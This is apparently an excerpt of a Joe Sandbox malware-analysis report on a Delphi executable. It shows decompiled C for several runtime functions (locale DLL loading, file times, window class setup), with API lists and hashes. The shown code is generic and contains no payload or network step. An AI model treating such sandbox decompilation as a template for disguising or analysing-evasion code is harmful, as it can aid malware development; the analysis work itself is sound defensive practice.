                                                    • Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                    • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 347 406313-406317 346->347 348 4063f6-4063fd 346->348 349 406323-406339 lstrlen 347->349 350 406319-40631d 347->350 351 40633c-40633f 349->351 350->348 350->349 352 406341-406349 351->352 353 40634b-406353 351->353 352->353 354 40633b 352->354 353->348 355 406359-40635e 353->355 354->351 356 406360-406386 lstrcpyn LoadLibraryExA 355->356 357 406388-40638a 355->357 356->357 357->348 358 40638c-406390 357->358 358->348 359 406392-4063c2 lstrcpyn LoadLibraryExA 358->359 359->348 360 4063c4-4063f4 lstrcpyn LoadLibraryExA 359->360 360->348
                                                    C-Code - Quality: 61%
                                                    			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                    0x004062dc
                                                    0x004062e4
                                                    0x004062eb
                                                    0x004062ec
                                                    0x004062ff
                                                    0x00406304
                                                    0x0040630d
                                                    0x004063f6
                                                    0x004063fd
                                                    0x00406323
                                                    0x00406323
                                                    0x00406329
                                                    0x0040632a
                                                    0x00406337
                                                    0x0040633c
                                                    0x0040633f
                                                    0x0040633b
                                                    0x00000000
                                                    0x0040633b
                                                    0x0040634b
                                                    0x00406353
                                                    0x00406359
                                                    0x0040635e
                                                    0x0040636b
                                                    0x0040636f
                                                    0x00406370
                                                    0x00406371
                                                    0x00406386
                                                    0x00406386
                                                    0x0040638a
                                                    0x004063a3
                                                    0x004063a7
                                                    0x004063a8
                                                    0x004063a9
                                                    0x004063b9
                                                    0x004063be
                                                    0x004063c2
                                                    0x004063c4
                                                    0x004063d9
                                                    0x004063dd
                                                    0x004063de
                                                    0x004063df
                                                    0x004063ef
                                                    0x004063f4
                                                    0x004063f4
                                                    0x004063c2
                                                    0x0040638a
                                                    0x00000000
                                                    0x00406353

                                                    APIs
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1599918012-2375825460
                                                    • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                    • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                    0x004099fb
                                                    0x00409a03
                                                    0x00409a39
                                                    0x00409a39
                                                    0x00409a05
                                                    0x00409a06
                                                    0x00409a12
                                                    0x00000000
                                                    0x00409a14
                                                    0x00409a1f
                                                    0x00409a37
                                                    0x00000000
                                                    0x00000000
                                                    0x00409a37
                                                    0x00409a12
                                                    0x00409a47

                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                    • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                                    • String ID:
                                                    • API String ID: 2659516521-0
                                                    • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                    • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E0043F118(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0043B6EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0043C1FC(_t50, _t68); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043F084(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00441A08(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E00441704(_t50);
						_push(_t32);
						L00407540();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E0043C1FC(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0043AAC0(_t50,  &_v28,  &_v20);
					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E004519E0(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00441704(__eax);
						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
							_t47 =  *0x49bce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x49bce0; // 0x0
								E0043C130(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}





















                                                    0x0043f11e
                                                    0x0043f120
                                                    0x0043f122
                                                    0x0043f124
                                                    0x0043f129
                                                    0x0043f148
                                                    0x0043f14b
                                                    0x0043f228
                                                    0x0043f22f
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f26b
                                                    0x0043f26f
                                                    0x00000000
                                                    0x0043f26f
                                                    0x0043f159
                                                    0x0043f1f2
                                                    0x0043f1f9
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1ff
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f203
                                                    0x0043f20a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f20f
                                                    0x0043f213
                                                    0x0043f216
                                                    0x0043f219
                                                    0x0043f21e
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f15f
                                                    0x0043f12b
                                                    0x0043f1a1
                                                    0x0043f1aa
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1b9
                                                    0x0043f1c8
                                                    0x0043f1d5
                                                    0x0043f1dc
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x0043f12d
                                                    0x0043f130
                                                    0x0043f16b
                                                    0x0043f16f
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f17b
                                                    0x0043f183
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f189
                                                    0x0043f132
                                                    0x0043f133
                                                    0x0043f192
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f135
                                                    0x0043f138
                                                    0x0043f235
                                                    0x0043f243
                                                    0x0043f24e
                                                    0x0043f256
                                                    0x0043f261
                                                    0x0043f266
                                                    0x0043f266
                                                    0x0043f256
                                                    0x0043f243
                                                    0x0043f138

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Capture
                                                    • String ID:
                                                    • API String ID: 1145282425-3916222277
                                                    • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                    • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004598AC Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E004598AC(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407540(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                    0x004598b8
                                                    0x004598c2
                                                    0x004598cb
                                                    0x004598d2
                                                    0x004598d5
                                                    0x004598d6
                                                    0x004598e1
                                                    0x004598e5

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                    • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004593B4 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E004593B4(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x459555);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x45955c);
					return E004049C0( &_v48);
				}
				_t22 =  *0x49dc84; // 0x49e04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00422BCC(E00459934, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x49bf54 = L00407540;
				_t26 =  *0x49bf74; // 0x45909c
				_t27 =  *0x49e668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x49e668; // 0x400000
					 *0x49bf60 = _t62;
					_t88 = RegisterClassA(0x49bf50);
					if(_t88 == 0) {
						_t64 =  *0x49d7fc; // 0x422f20
						E00406A70(_t64,  &_v48);
						E0040D144(_v48, 1);
						E00404378();
					}
				}
				_t29 =  *0x49d970; // 0x49e900
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x49d970; // 0x49e900
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x49e668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x96000045
				_t39 = E00404E80( *_t7);
				_t40 =  *0x49bf74; // 0x45909c, executed
				_t41 = E00407AE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45150c
				E004049C0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x49da40; // 0x49eb1c
				if( *_t47 != 0) {
					_t55 = E0045A038(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0045A038(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x49da40; // 0x49eb1c
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                                    0x004593bd
                                                    0x004593c0
                                                    0x004593c4
                                                    0x004593c5
                                                    0x004593ca
                                                    0x004593cd
                                                    0x004593d7
                                                    0x0045953f
                                                    0x00459541
                                                    0x00459544
                                                    0x00459547
                                                    0x00459554
                                                    0x00459554
                                                    0x004593dd
                                                    0x004593e5
                                                    0x00000000
                                                    0x00000000
                                                    0x004593f1
                                                    0x004593f6
                                                    0x004593fe
                                                    0x00459407
                                                    0x0045940d
                                                    0x0045941a
                                                    0x0045941c
                                                    0x00459421
                                                    0x00459430
                                                    0x00459433
                                                    0x00459438
                                                    0x0045943d
                                                    0x0045944c
                                                    0x00459451
                                                    0x00459451
                                                    0x00459433
                                                    0x00459458
                                                    0x00459461
                                                    0x00459463
                                                    0x00459465
                                                    0x00459465
                                                    0x0045946b
                                                    0x00459474
                                                    0x00459476
                                                    0x00459478
                                                    0x00459478
                                                    0x0045947b
                                                    0x0045947c
                                                    0x0045947e
                                                    0x00459480
                                                    0x00459482
                                                    0x00459484
                                                    0x00459489
                                                    0x0045948a
                                                    0x0045948c
                                                    0x00459492
                                                    0x0045949e
                                                    0x004594a3
                                                    0x004594a8
                                                    0x004594ab
                                                    0x004594b1
                                                    0x004594b6
                                                    0x004594bd
                                                    0x004594c3
                                                    0x004594c7
                                                    0x004594cc
                                                    0x004594d4
                                                    0x004594d8
                                                    0x004594e5
                                                    0x004594e9
                                                    0x004594f0
                                                    0x004594f8
                                                    0x004594fc
                                                    0x004594fc
                                                    0x00459503
                                                    0x0045950c
                                                    0x00459516
                                                    0x00459523
                                                    0x00459528
                                                    0x00459530
                                                    0x0045953a
                                                    0x0045953a
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    • GetClassInfoA.USER32 ref: 00459413
                                                    • RegisterClassA.USER32 ref: 0045942B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 004594C7
                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                    • String ID: /B$@u@$LI
                                                    • API String ID: 2103932818-2136969242
                                                    • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                    • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 86%
                                                    			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x0
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
				 *0x49eb24 = _t27;
				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x0
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x0
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				E00445F34();
				 *0x49eb18 = E00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                    0x00446339
                                                    0x0044633c
                                                    0x00446341
                                                    0x00446342
                                                    0x00446347
                                                    0x0044634a
                                                    0x00446356
                                                    0x00446359
                                                    0x00446367
                                                    0x00446374
                                                    0x00446379
                                                    0x00446384
                                                    0x00446389
                                                    0x00446393
                                                    0x00446398
                                                    0x0044639b
                                                    0x004463a4
                                                    0x004463a7
                                                    0x004463b8
                                                    0x004463c5
                                                    0x004463ca
                                                    0x004463da
                                                    0x004463e0
                                                    0x004463f0
                                                    0x00446401
                                                    0x00446406
                                                    0x00446417
                                                    0x00446425
                                                    0x0044642a
                                                    0x00446430
                                                    0x0044643b
                                                    0x00446440
                                                    0x00446446
                                                    0x00446448
                                                    0x00446451
                                                    0x00446460
                                                    0x00446465
                                                    0x00446474
                                                    0x00446478
                                                    0x00446485
                                                    0x00446485
                                                    0x0044648c
                                                    0x0044648f
                                                    0x00446492
                                                    0x0044649a
                                                    0x004464a7

                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                    • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                    • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                    • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                    • RegisterClipboardFormatA.USER32 ref: 004463EB
